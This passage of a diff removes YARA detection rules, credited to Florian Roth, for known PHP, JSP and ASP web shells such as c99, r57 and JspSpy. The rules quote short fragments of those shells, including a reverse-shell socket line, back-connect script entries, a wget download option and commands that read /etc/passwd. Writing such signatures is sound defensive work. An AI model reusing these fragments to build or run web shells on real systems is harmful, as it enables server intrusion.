-		hash0 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash1 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash2 = "341298482cf90febebb8616426080d1d"
-		hash3 = "88fc87e7c58249a398efd5ceae636073"
-		hash4 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-	strings:
-		$s1 = "url_con.setRequestProperty(\"REFERER\", \"\"+fckal+\"\");" fullword
-		$s9 = "FileLocalUpload(uc(dx())+sxm,request.getRequestURL().toString(),  \"GBK\");" fullword
-	condition:
-		1 of them
-}
-rule webshell_Dive_Shell_1_0_Emperor_Hacking_Team_xxx {
-	meta:
-		description = "Web Shell - from files Dive Shell 1.0 - Emperor Hacking Team.php, phpshell.php, SimShell 1.0 - Simorgh Security MGZ.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "1b5102bdc41a7bc439eea8f0010310a5"
-		hash1 = "f8a6d5306fb37414c5c772315a27832f"
-		hash2 = "37cb1db26b1b0161a4bf678a6b4565bd"
-	strings:
-		$s1 = "if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== fals"
-		$s9 = "if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {" fullword
-	condition:
-		all of them
-}
-rule webshell_404_data_in_JFolder_jfolder01_xxx {
-	meta:
-		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, suiyue.jsp, warn.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "7066f4469c3ec20f4890535b5f299122"
-		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
-		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash3 = "8979594423b68489024447474d113894"
-		hash4 = "ec482fc969d182e5440521c913bab9bd"
-		hash5 = "f98d2b33cd777e160d1489afed96de39"
-		hash6 = "4b4c12b3002fad88ca6346a873855209"
-		hash7 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
-		hash8 = "e9a5280f77537e23da2545306f6a19ad"
-	strings:
-		$s4 = "&nbsp;<TEXTAREA NAME=\"cqq\" ROWS=\"20\" COLS=\"100%\"><%=sbCmd.toString()%></TE"
-	condition:
-		all of them
-}
-rule webshell_jsp_reverse_jsp_reverse_jspbd {
-	meta:
-		description = "Web Shell - from files jsp-reverse.jsp, jsp-reverse.jsp, jspbd.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		super_rule = 1
-		hash0 = "8b0e6779f25a17f0ffb3df14122ba594"
-		hash1 = "ea87f0c1f0535610becadf5a98aca2fc"
-		hash2 = "7d5e9732766cf5b8edca9b7ae2b6028f"
-		score = 50
-	strings:
-		$s0 = "osw = new BufferedWriter(new OutputStreamWriter(os));" fullword
-		$s7 = "sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());" fullword
-		$s9 = "isr = new BufferedReader(new InputStreamReader(is));" fullword
-	condition:
-		all of them
-}
-rule webshell_400_in_JFolder_jfolder01_jsp_leo_warn_webshell_nc {
-	meta:
-		description = "Web Shell - from files 400.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, leo.jsp, warn.jsp, webshell-nc.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "36331f2c81bad763528d0ae00edf55be"
-		hash1 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash2 = "8979594423b68489024447474d113894"
-		hash3 = "ec482fc969d182e5440521c913bab9bd"
-		hash4 = "f98d2b33cd777e160d1489afed96de39"
-		hash5 = "4b4c12b3002fad88ca6346a873855209"
-		hash6 = "e9a5280f77537e23da2545306f6a19ad"
-		hash7 = "598eef7544935cf2139d1eada4375bb5"
-	strings:
-		$s0 = "sbFolder.append(\"<tr><td >&nbsp;</td><td>\");" fullword
-		$s1 = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword
-		$s5 = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword
-		$s6 = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword
-	condition:
-		2 of them
-}
-rule webshell_2_520_job_JspWebshell_1_2_ma1_ma4_2 {
-	meta:
-		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "64a3bf9142b045b9062b204db39d4d57"
-		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
-		hash2 = "56c005690da2558690c4aa305a31ad37"
-		hash3 = "70a0ee2624e5bbe5525ccadc467519f6"
-		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
-		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
-		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
-	strings:
-		$s1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword
-		$s6 = "password = (String)session.getAttribute(\"password\");" fullword
-		$s7 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231"
-	condition:
-		2 of them
-}
-rule webshell_shell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {
-	meta:
-		description = "Web Shell - from files shell.php, 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 60
-		super_rule = 1
-		hash0 = "791708057d8b429d91357d38edf43cc0"
-		hash1 = "3e4ba470d4c38765e4b16ed930facf2c"
-		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
-		hash3 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash4 = "40a1f840111996ff7200d18968e42cfe"
-		hash5 = "e0202adff532b28ef1ba206cf95962f2"
-		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
-	strings:
-		$s0 = "$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";" fullword
-		$s5 = "while(list($kname, $columns) = @each($index)) {" fullword
-		$s6 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\";" fullword
-		$s9 = "$tabledump .= \"   PRIMARY KEY ($colnames)\";" fullword
-		$fn = "filename: backup"
-	condition:
-		2 of ($s*) and not $fn
-}
-rule webshell_gfs_sh_r57shell_r57shell127_SnIpEr_SA_xxx {
-	meta:
-		description = "Web Shell - from files gfs_sh.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, r57.php, Backdoor.PHP.Agent.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "a2516ac6ee41a7cf931cbaef1134a9e4"
-		hash1 = "ef43fef943e9df90ddb6257950b3538f"
-		hash2 = "ae025c886fbe7f9ed159f49593674832"
-		hash3 = "911195a9b7c010f61b66439d9048f400"
-		hash4 = "697dae78c040150daff7db751fc0c03c"
-		hash5 = "513b7be8bd0595c377283a7c87b44b2e"
-		hash6 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash7 = "e5b2131dd1db0dbdb43b53c5ce99016a"
-		hash8 = "4108f28a9792b50d95f95b9e5314fa1e"
-		hash9 = "41af6fd253648885c7ad2ed524e0692d"
-		hash10 = "6fcc283470465eed4870bcc3e2d7f14d"
-	strings:
-		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
-		$s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC"
-	condition:
-		all of them
-}
-rule webshell_itsec_PHPJackal_itsecteam_shell_jHn {
-	meta:
-		description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
-		hash1 = "e2830d3286001d1455479849aacbbb38"
-		hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4"
-		hash3 = "40c6ecf77253e805ace85f119fe1cebb"
-	strings:
-		$s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword
-		$s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|"
-		$s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+"
-	condition:
-		2 of them
-}
-rule webshell_Shell_ci_Biz_was_here_c100_v_xxx {
-	meta:
-		description = "Web Shell - from files Shell [ci] .Biz was here.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c99-shadows-mod.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "f2fa878de03732fbf5c86d656467ff50"
-		hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c"
-		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
-	strings:
-		$s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri"
-		$s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\""
-		$s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword
-		$s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de"
-		$s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER"
-	condition:
-		2 of them
-}
-rule webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_xxx1 {
-	meta:
-		description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, KAdot Universal Shell v0.1.6.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
-		hash1 = "f3ca29b7999643507081caab926e2e74"
-		hash2 = "527cf81f9272919bf872007e21c4bdda"
-	strings:
-		$s1 = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type="
-		$s2 = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword
-		$s6 = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword
-		$s7 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword
-	condition:
-		2 of them
-}
-rule webshell_c99_c99shell_c99_w4cking_Shell_xxx {
-	meta:
-		description = "Web Shell - from files c99.php, c99shell.php, c99_w4cking.php, Shell [ci] .Biz was here.php, acid.php, c100 v. 777shell v. Undetectable #18a Modded by 777 - Don.php, c66.php, c99-shadows-mod.php, c99.php, c99shell.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
-		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
-		hash2 = "9c34adbc8fd8d908cbb341734830f971"
-		hash3 = "f2fa878de03732fbf5c86d656467ff50"
-		hash4 = "b8f261a3cdf23398d573aaf55eaf63b5"
-		hash5 = "27786d1e0b1046a1a7f67ee41c64bf4c"
-		hash6 = "0f5b9238d281bc6ac13406bb24ac2a5b"
-		hash7 = "68c0629d08b1664f5bcce7d7f5f71d22"
-		hash8 = "157b4ac3c7ba3a36e546e81e9279eab5"
-		hash9 = "048ccc01b873b40d57ce25a4c56ea717"
-	strings:
-		$s0 = "echo \"<b>HEXDUMP:</b><nobr>"
-		$s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword
-		$s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r"
-		$s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB "
-		$s8 = "echo \"<center><b>Server-status variables:</b><br><br>\";" fullword
-		$s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>"
-	condition:
-		2 of them
-}
-rule webshell_2008_2009mssql_phpspy_2005_full_phpspy_2006_arabicspy_hkrkoz {
-	meta:
-		description = "Web Shell - from files 2008.php, 2009mssql.php, phpspy_2005_full.php, phpspy_2006.php, arabicspy.php, hkrkoz.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
-		hash1 = "aa17b71bb93c6789911bd1c9df834ff9"
-		hash2 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash3 = "40a1f840111996ff7200d18968e42cfe"
-		hash4 = "e0202adff532b28ef1ba206cf95962f2"
-		hash5 = "802f5cae46d394b297482fd0c27cb2fc"
-	strings:
-		$s0 = "$this -> addFile($content, $filename);" fullword
-		$s3 = "function addFile($data, $name, $time = 0) {" fullword
-		$s8 = "function unix2DosTime($unixtime = 0) {" fullword
-		$s9 = "foreach($filelist as $filename){" fullword
-	condition:
-		all of them
-}
-rule webshell_c99_c66_c99_shadows_mod_c99shell {
-	meta:
-		description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
-		hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b"
-		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
-		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
-	strings:
-		$s2 = "  if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv"
-		$s3 = "  \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword
-		$s4 = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66"
-		$s7 = "   elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources"
-		$s8 = "  \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos"
-		$s9 = "   elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!"
-	condition:
-		2 of them
-}
-rule webshell_he1p_JspSpy_nogfw_ok_style_1_JspSpy1 {
-	meta:
-		description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash1 = "d71716df5042880ef84427acee8b121e"
-		hash2 = "344f9073576a066142b2023629539ebd"
-		hash3 = "32dea47d9c13f9000c4c807561341bee"
-		hash4 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash5 = "3ea688e3439a1f56b16694667938316d"
-		hash6 = "2434a7a07cb47ce25b41d30bc291cacc"
-	strings:
-		$s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" fullword
-		$s4 = "out.println(\"<h2>File Manager - Current disk &quot;\"+(cr.indexOf(\"/\") == 0?"
-		$s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword
-		$s8 = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>"
-	condition:
-		2 of them
-}
-rule webshell_000_403_c5_config_myxx_queryDong_spyjsp2010_zend {
-	meta:
-		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "8b457934da3821ba58b06a113e0d53d9"
-		hash3 = "d44df8b1543b837e57cc8f25a0a68d92"
-		hash4 = "e0354099bee243702eb11df8d0e046df"
-		hash5 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash6 = "655722eaa6c646437c8ae93daac46ae0"
-		hash7 = "591ca89a25f06cf01e4345f98a22845c"
-	strings:
-		$s0 = "return new Double(format.format(value)).doubleValue();" fullword
-		$s5 = "File tempF = new File(savePath);" fullword
-		$s9 = "if (tempF.isDirectory()) {" fullword
-	condition:
-		2 of them
-}
-rule webshell_c99_c99shell_c99_c99shell {
-	meta:
-		description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
-		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
-		hash2 = "157b4ac3c7ba3a36e546e81e9279eab5"
-		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
-	strings:
-		$s2 = "$bindport_pass = \"c99\";" fullword
-		$s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr"
-	condition:
-		1 of them
-}
-rule webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat {
-	meta:
-		description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "ae025c886fbe7f9ed159f49593674832"
-		hash1 = "513b7be8bd0595c377283a7c87b44b2e"
-		hash2 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash3 = "4108f28a9792b50d95f95b9e5314fa1e"
-		hash4 = "3f71175985848ee46cc13282fbed2269"
-	strings:
-		$s6 = "$res   = @mysql_query(\"SHOW CREATE TABLE `\".$_POST['mysql_tbl'].\"`\", $d"
-		$s7 = "$sql1 .= $row[1].\"\\r\\n\\r\\n\";" fullword
-		$s8 = "if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }" fullword
-		$s9 = "foreach($values as $k=>$v) {$values[$k] = addslashes($v);}" fullword
-	condition:
-		2 of them
-}
-rule webshell_NIX_REMOTE_WEB_SHELL_nstview_xxx {
-	meta:
-		description = "Web Shell - from files NIX REMOTE WEB-SHELL.php, nstview.php, NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version.php, Cyber Shell (v 1.0).php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
-		hash1 = "4745d510fed4378e4b1730f56f25e569"
-		hash2 = "f3ca29b7999643507081caab926e2e74"
-		hash3 = "46a18979750fa458a04343cf58faa9bd"
-	strings:
-		$s3 = "BODY, TD, TR {" fullword
-		$s5 = "$d=str_replace(\"\\\\\",\"/\",$d);" fullword
-		$s6 = "if ($file==\".\" || $file==\"..\") continue;" fullword
-	condition:
-		2 of them
-}
-rule webshell_000_403_807_a_c5_config_css_dm_he1p_xxx {
-	meta:
-		description = "Web Shell - from files 000.jsp, 403.jsp, 807.jsp, a.jsp, c5.jsp, config.jsp, css.jsp, dm.jsp, he1p.jsp, JspSpy.jsp, JspSpyJDK5.jsp, JspSpyJDK51.jsp, luci.jsp.spy2009.jsp, m.jsp, ma3.jsp, mmym520.jsp, myxx.jsp, nogfw.jsp, ok.jsp, queryDong.jsp, spyjsp2010.jsp, style.jsp, u.jsp, xia.jsp, zend.jsp, cofigrue.jsp, 1.jsp, jspspy.jsp, jspspy_k8.jsp, JspSpy.jsp, JspSpyJDK5.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "ae76c77fb7a234380cd0ebb6fe1bcddf"
-		hash3 = "76037ebd781ad0eac363d56fc81f4b4f"
-		hash4 = "8b457934da3821ba58b06a113e0d53d9"
-		hash5 = "d44df8b1543b837e57cc8f25a0a68d92"
-		hash6 = "fc44f6b4387a2cb50e1a63c66a8cb81c"
-		hash7 = "14e9688c86b454ed48171a9d4f48ace8"
-		hash8 = "b330a6c2d49124ef0729539761d6ef0b"
-		hash9 = "d71716df5042880ef84427acee8b121e"
-		hash10 = "341298482cf90febebb8616426080d1d"
-		hash11 = "29aebe333d6332f0ebc2258def94d57e"
-		hash12 = "42654af68e5d4ea217e6ece5389eb302"
-		hash13 = "88fc87e7c58249a398efd5ceae636073"
-		hash14 = "4a812678308475c64132a9b56254edbc"
-		hash15 = "9626eef1a8b9b8d773a3b2af09306a10"
-		hash16 = "e0354099bee243702eb11df8d0e046df"
-		hash17 = "344f9073576a066142b2023629539ebd"
-		hash18 = "32dea47d9c13f9000c4c807561341bee"
-		hash19 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash20 = "655722eaa6c646437c8ae93daac46ae0"
-		hash21 = "b9744f6876919c46a29ea05b1d95b1c3"
-		hash22 = "6acc82544be056580c3a1caaa4999956"
-		hash23 = "6aa32a6392840e161a018f3907a86968"
-		hash24 = "591ca89a25f06cf01e4345f98a22845c"
-		hash25 = "349ec229e3f8eda0f9eb918c74a8bf4c"
-		hash26 = "3ea688e3439a1f56b16694667938316d"
-		hash27 = "ab77e4d1006259d7cbc15884416ca88c"
-		hash28 = "71097537a91fac6b01f46f66ee2d7749"
-		hash29 = "2434a7a07cb47ce25b41d30bc291cacc"
-		hash30 = "7a4b090619ecce6f7bd838fe5c58554b"
-	strings:
-		$s3 = "String savePath = request.getParameter(\"savepath\");" fullword
-		$s4 = "URL downUrl = new URL(downFileUrl);" fullword
-		$s5 = "if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))" fullword
-		$s6 = "String downFileUrl = request.getParameter(\"url\");" fullword
-		$s7 = "FileInputStream fInput = new FileInputStream(f);" fullword
-		$s8 = "URLConnection conn = downUrl.openConnection();" fullword
-		$s9 = "sis = request.getInputStream();" fullword
-	condition:
-		4 of them
-}
-rule webshell_2_520_icesword_job_ma1 {
-	meta:
-		description = "Web Shell - from files 2.jsp, 520.jsp, icesword.jsp, job.jsp, ma1.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "64a3bf9142b045b9062b204db39d4d57"
-		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
-		hash2 = "077f4b1b6d705d223b6d644a4f3eebae"
-		hash3 = "56c005690da2558690c4aa305a31ad37"
-		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
-	strings:
-		$s1 = "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=gb2312\"></head>" fullword
-		$s3 = "<input type=\"hidden\" name=\"_EVENTTARGET\" value=\"\" />" fullword
-		$s8 = "<input type=\"hidden\" name=\"_EVENTARGUMENT\" value=\"\" />" fullword
-	condition:
-		2 of them
-}
-rule webshell_404_data_in_JFolder_jfolder01_jsp_suiyue_warn {
-	meta:
-		description = "Web Shell - from files 404.jsp, data.jsp, in.jsp, JFolder.jsp, jfolder01.jsp, jsp.jsp, suiyue.jsp, warn.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "7066f4469c3ec20f4890535b5f299122"
-		hash1 = "9f54aa7b43797be9bab7d094f238b4ff"
-		hash2 = "793b3d0a740dbf355df3e6f68b8217a4"
-		hash3 = "8979594423b68489024447474d113894"
-		hash4 = "ec482fc969d182e5440521c913bab9bd"
-		hash5 = "f98d2b33cd777e160d1489afed96de39"
-		hash6 = "c93d5bdf5cf62fe22e299d0f2b865ea7"
-		hash7 = "e9a5280f77537e23da2545306f6a19ad"
-	strings:
-		$s0 = "<table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol"
-		$s2 = " KB </td>" fullword
-		$s3 = "<table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\""
-		$s4 = "<!-- <tr align=\"center\"> " fullword
-	condition:
-		all of them
-}
-
-rule webshell_phpspy_2005_full_phpspy_2005_lite_phpspy_2006_PHPSPY {
-	meta:
-		description = "Web Shell - from files phpspy_2005_full.php, phpspy_2005_lite.php, phpspy_2006.php, PHPSPY.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "b68bfafc6059fd26732fa07fb6f7f640"
-		hash1 = "42f211cec8032eb0881e87ebdb3d7224"
-		hash2 = "40a1f840111996ff7200d18968e42cfe"
-		hash3 = "0712e3dc262b4e1f98ed25760b206836"
-	strings:
-		$s4 = "http://www.4ngel.net" fullword
-		$s5 = "</a> | <a href=\"?action=phpenv\">PHP" fullword
-		$s8 = "echo $msg=@fwrite($fp,$_POST['filecontent']) ? \"" fullword
-		$s9 = "Codz by Angel" fullword
-	condition:
-		2 of them
-}
-rule webshell_c99_locus7s_c99_w4cking_xxx {
-	meta:
-		description = "Web Shell - from files c99_locus7s.php, c99_w4cking.php, r57shell.php, r57shell127.php, SnIpEr_SA Shell.php, EgY_SpIdEr ShElL V2.php, r57_iFX.php, r57_kartal.php, r57_Mohajer22.php, r57.php, acid.php, newsh.php, r57.php, Backdoor.PHP.Agent.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "38fd7e45f9c11a37463c3ded1c76af4c"
-		hash1 = "9c34adbc8fd8d908cbb341734830f971"
-		hash2 = "ef43fef943e9df90ddb6257950b3538f"
-		hash3 = "ae025c886fbe7f9ed159f49593674832"
-		hash4 = "911195a9b7c010f61b66439d9048f400"
-		hash5 = "697dae78c040150daff7db751fc0c03c"
-		hash6 = "513b7be8bd0595c377283a7c87b44b2e"
-		hash7 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash8 = "e5b2131dd1db0dbdb43b53c5ce99016a"
-		hash9 = "4108f28a9792b50d95f95b9e5314fa1e"
-		hash10 = "b8f261a3cdf23398d573aaf55eaf63b5"
-		hash11 = "0d2c2c151ed839e6bafc7aa9c69be715"
-		hash12 = "41af6fd253648885c7ad2ed524e0692d"
-		hash13 = "6fcc283470465eed4870bcc3e2d7f14d"
-	strings:
-		$s1 = "$res = @shell_exec($cfe);" fullword
-		$s8 = "$res = @ob_get_contents();" fullword
-		$s9 = "@exec($cfe,$res);" fullword
-	condition:
-		2 of them
-}
-rule webshell_browser_201_3_ma_ma2_download {
-	meta:
-		description = "Web Shell - from files browser.jsp, 201.jsp, 3.jsp, ma.jsp, ma2.jsp, download.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "37603e44ee6dc1c359feb68a0d566f76"
-		hash1 = "a7e25b8ac605753ed0c438db93f6c498"
-		hash2 = "fb8c6c3a69b93e5e7193036fd31a958d"
-		hash3 = "4cc68fa572e88b669bce606c7ace0ae9"
-		hash4 = "4b45715fa3fa5473640e17f49ef5513d"
-		hash5 = "fa87bbd7201021c1aefee6fcc5b8e25a"
-	strings:
-		$s1 = "private static final int EDITFIELD_ROWS = 30;" fullword
-		$s2 = "private static String tempdir = \".\";" fullword
-		$s6 = "<input type=\"hidden\" name=\"dir\" value=\"<%=request.getAttribute(\"dir\")%>\""
-	condition:
-		2 of them
-}
-rule webshell_000_403_c5_queryDong_spyjsp2010 {
-	meta:
-		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, queryDong.jsp, spyjsp2010.jsp"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
-		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
-		hash2 = "8b457934da3821ba58b06a113e0d53d9"
-		hash3 = "90a5ba0c94199269ba33a58bc6a4ad99"
-		hash4 = "655722eaa6c646437c8ae93daac46ae0"
-	strings:
-		$s2 = "\" <select name='encode' class='input'><option value=''>ANSI</option><option val"
-		$s7 = "JSession.setAttribute(\"MSG\",\"<span style='color:red'>Upload File Failed!</spa"
-		$s8 = "File f = new File(JSession.getAttribute(CURRENT_DIR)+\"/\"+fileBean.getFileName("
-		$s9 = "((Invoker)ins.get(\"vd\")).invoke(request,response,JSession);" fullword
-	condition:
-		2 of them
-}
-rule webshell_r57shell127_r57_kartal_r57 {
-	meta:
-		description = "Web Shell - from files r57shell127.php, r57_kartal.php, r57.php"
-		author = "Florian Roth"
-		date = "2014/01/28"
-		score = 70
-		super_rule = 1
-		hash0 = "ae025c886fbe7f9ed159f49593674832"
-		hash1 = "1d912c55b96e2efe8ca873d6040e3b30"
-		hash2 = "4108f28a9792b50d95f95b9e5314fa1e"
-	strings:
-		$s2 = "$handle = @opendir($dir) or die(\"Can't open directory $dir\");" fullword
-		$s3 = "if(!empty($_POST['mysql_db'])) { @mssql_select_db($_POST['mysql_db'],$db); }" fullword
-		$s5 = "if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || $_"
-	condition:
-		2 of them
-}
-
-rule webshell_webshells_new_con2 {
-	meta:
-		description = "Web shells - generated from file con2.asp"
-		author = "Florian Roth"
-		date = "2014/03/28"
-		score = 70
-		hash = "d3584159ab299d546bd77c9654932ae3"
-	strings:
-		$s7 = ",htaPrewoP(ecalper=htaPrewoP:fI dnE:0=KOtidE:1 - eulaVtni = eulaVtni:nehT 1 => e"
-		$s10 = "j \"<Form action='\"&URL&\"?Action2=Post' method='post' name='EditForm'><input n"
-	condition:
-		1 of them
